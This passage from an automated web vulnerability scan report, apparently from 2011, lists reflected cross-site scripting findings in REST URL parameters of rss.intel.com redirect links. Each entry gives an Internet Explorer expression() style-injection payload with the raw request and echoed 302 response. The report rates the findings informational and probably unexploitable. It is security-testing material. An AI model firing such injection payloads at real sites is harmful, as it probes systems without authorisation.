Location: http://newsroom.intel.com/community/intel_newsroom/blog836ce"style="x:expression(alert(1))"5c86aca20ef/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog836ce"style="x:expression(alert(1))"5c86aca20ef/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110">
...[SNIP]...

4.23. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 7]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0641"style%3d"x%3aexpression(alert(1))"b954a0a85d7 was submitted in the REST URL parameter 7. This input was echoed as a0641"style="x:expression(alert(1))"b954a0a85d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011a0641"style%3d"x%3aexpression(alert(1))"b954a0a85d7/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:25 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011a0641"style="x:expression(alert(1))"b954a0a85d7/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011a0641"style="x:expression(alert(1))"b954a0a85d7/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110">
...[SNIP]...

4.24. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 8]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9097b"style%3d"x%3aexpression(alert(1))"cec4b375443 was submitted in the REST URL parameter 8. This input was echoed as 9097b"style="x:expression(alert(1))"cec4b375443 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/019097b"style%3d"x%3aexpression(alert(1))"cec4b375443/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:29 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/019097b"style="x:expression(alert(1))"cec4b375443/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/019097b"style="x:expression(alert(1))"cec4b375443/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110">
...[SNIP]...

4.25. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 9]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3032"style%3d"x%3aexpression(alert(1))"44ad55bd7e was submitted in the REST URL parameter 9. This input was echoed as d3032"style="x:expression(alert(1))"44ad55bd7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31d3032"style%3d"x%3aexpression(alert(1))"44ad55bd7e/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:34 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31d3032"style="x:expression(alert(1))"44ad55bd7e/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110
Content-Length: 235
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31d3032"style="x:expression(alert(1))"44ad55bd7e/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110">
...[SNIP]...

4.26. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 10]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry

Issue detail

The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1f4c"style%3d"x%3aexpression(alert(1))"fade0cdb384 was submitted in the REST URL parameter 10. This input was echoed as b1f4c"style="x:expression(alert(1))"fade0cdb384 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industryb1f4c"style%3d"x%3aexpression(alert(1))"fade0cdb384 HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:38 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industryb1f4c"style="x:expression(alert(1))"fade0cdb384?cid=rss-182178-c1-264136
Content-Length: 256
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industryb1f4c"style="x:expression(alert(1))"fade0cdb384?cid=rss-182178-c1-264136">
...[SNIP]...

4.27. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 2]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ebf"style%3d"x%3aexpression(alert(1))"590865e6e81 was submitted in the REST URL parameter 2. This input was echoed as b0ebf"style="x:expression(alert(1))"590865e6e81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264136b0ebf"style%3d"x%3aexpression(alert(1))"590865e6e81/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:02 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136b0ebf"style="x:expression(alert(1))"590865e6e81
Content-Length: 256
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136b0ebf"style="x:expression(alert(1))"590865e6e81">
...[SNIP]...

4.28. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 3]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 466d2"style%3d"x%3aexpression(alert(1))"1ac3c960942 was submitted in the REST URL parameter 3. This input was echoed as 466d2"style="x:expression(alert(1))"1ac3c960942 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264136/newsroom.intel.com466d2"style%3d"x%3aexpression(alert(1))"1ac3c960942/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:07 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com466d2"style="x:expression(alert(1))"1ac3c960942/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry
Content-Length: 231
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com466d2"style="x:expression(alert(1))"1ac3c960942/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry">
...[SNIP]...

4.29. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 4]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9389"style%3d"x%3aexpression(alert(1))"f5c3f0bb420 was submitted in the REST URL parameter 4. This input was echoed as b9389"style="x:expression(alert(1))"f5c3f0bb420 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264136/newsroom.intel.com/communityb9389"style%3d"x%3aexpression(alert(1))"f5c3f0bb420/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:12 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/communityb9389"style="x:expression(alert(1))"f5c3f0bb420/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136
Content-Length: 256
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/communityb9389"style="x:expression(alert(1))"f5c3f0bb420/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136">
...[SNIP]...

4.30. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 5]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12e33"style%3d"x%3aexpression(alert(1))"4ade294bbf was submitted in the REST URL parameter 5. This input was echoed as 12e33"style="x:expression(alert(1))"4ade294bbf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom12e33"style%3d"x%3aexpression(alert(1))"4ade294bbf/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:16 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom12e33"style="x:expression(alert(1))"4ade294bbf/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136
Content-Length: 255
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom12e33"style="x:expression(alert(1))"4ade294bbf/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136">
...[SNIP]...

4.31. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 6]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f162d"style%3d"x%3aexpression(alert(1))"85b19f3f875 was submitted in the REST URL parameter 6. This input was echoed as f162d"style="x:expression(alert(1))"85b19f3f875 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blogf162d"style%3d"x%3aexpression(alert(1))"85b19f3f875/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:21 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blogf162d"style="x:expression(alert(1))"85b19f3f875/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136
Content-Length: 256
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blogf162d"style="x:expression(alert(1))"85b19f3f875/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136">
...[SNIP]...

4.32. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 7]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81880"style%3d"x%3aexpression(alert(1))"bb824d9c0ed was submitted in the REST URL parameter 7. This input was echoed as 81880"style="x:expression(alert(1))"bb824d9c0ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/201181880"style%3d"x%3aexpression(alert(1))"bb824d9c0ed/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:25 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/201181880"style="x:expression(alert(1))"bb824d9c0ed/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136
Content-Length: 256
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/201181880"style="x:expression(alert(1))"bb824d9c0ed/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136">
...[SNIP]...

4.33. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 8]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8cfc"style%3d"x%3aexpression(alert(1))"cbc4fac7e2f was submitted in the REST URL parameter 8. This input was echoed as d8cfc"style="x:expression(alert(1))"cbc4fac7e2f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01d8cfc"style%3d"x%3aexpression(alert(1))"cbc4fac7e2f/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:29 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01d8cfc"style="x:expression(alert(1))"cbc4fac7e2f/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136
Content-Length: 256
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01d8cfc"style="x:expression(alert(1))"cbc4fac7e2f/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136">
...[SNIP]...

4.34. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 9]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bac26"style%3d"x%3aexpression(alert(1))"4f9f28749e was submitted in the REST URL parameter 9. This input was echoed as bac26"style="x:expression(alert(1))"4f9f28749e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31bac26"style%3d"x%3aexpression(alert(1))"4f9f28749e/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:34 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31bac26"style="x:expression(alert(1))"4f9f28749e/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136
Content-Length: 255
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31bac26"style="x:expression(alert(1))"4f9f28749e/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136">
...[SNIP]...

4.35. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 10]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard

Issue detail

The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28736"style%3d"x%3aexpression(alert(1))"42af1674784 was submitted in the REST URL parameter 10. This input was echoed as 28736"style="x:expression(alert(1))"42af1674784 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard28736"style%3d"x%3aexpression(alert(1))"42af1674784 HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:37 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard28736"style="x:expression(alert(1))"42af1674784?cid=rss-182178-c1-264138
Content-Length: 244
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard28736"style="x:expression(alert(1))"42af1674784?cid=rss-182178-c1-264138">
...[SNIP]...

